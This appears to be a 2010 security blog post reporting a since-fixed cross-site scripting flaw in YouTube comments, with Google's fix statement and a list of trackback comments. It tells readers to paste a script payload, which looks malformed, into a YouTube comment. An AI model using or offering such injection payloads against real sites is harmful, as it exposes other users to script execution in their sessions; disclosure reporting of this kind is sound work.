Cross-site scripting on YouTube

XSS vulnerability in YouTube comments processing allows an attacker to execute arbitrary scripts in the security context.

Go on youtube. Choose any video. Add the following script:

[php]<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>[/php]

Update (1): It is better to stay away from YouTube until they fix the vulnerability or at least logging out of YouTube if you use it.

Update (2): Google has informed that the vulnerability has now been fixed:

We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.

you can find the statement here.

make sure you subscribe to my RSS feed!

Share
Subscribe
Notify of
guest
10 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback

[…] This post was mentioned on Twitter by Lance Miller, Mourad ben lakhoua and others. Mourad ben lakhoua said: Cross-site scripting on YouTube https://www.sectechno.com/2010/07/04/cross-site-scripting-on-youtube/ http://fb.me/xfnuNsdx […]

trackback

RT @Hfuhs: Cross-site scripting on YouTube fixed – http://fuhs.eu/1uk

trackback

Cross-site scripting on YouTube fixed – http://fuhs.eu/1uk

trackback

RT @MBenLakhoua Google has informed that youtube XSS vulnerability has now been fixed http://bit.ly/bw5y5s

trackback

RT @MBenLakhoua Cross-site scripting on YouTube:

XSS vulnerability in YouTube comments processing allows an… http://bit.ly/cqqr3K

trackback

RT @silvakreuz: #Google has informed that #YouTube #XSS #vulnerability has now been fixed http://bit.ly/bw5y5s (via RT @paperghost @MBen …

trackback

RT: @klightowler: Google fixes cross-site scripting vulnerability on youtube.com http://bit.ly/9RZEwA < 4chan were having a field day

trackback

Google fixes cross-site scripting (XSS) vulnerability on youtube.com http://bit.ly/9RZEwA

trackback

#Google has informed that #YouTube #XSS #vulnerability has now been fixed http://bit.ly/bw5y5s (via RT @paperghost @MBenLakhoua)

trackback

RT @sectechno: Google has informed that youtube XSS vulnerability has now been fixed http://bit.ly/bw5y5s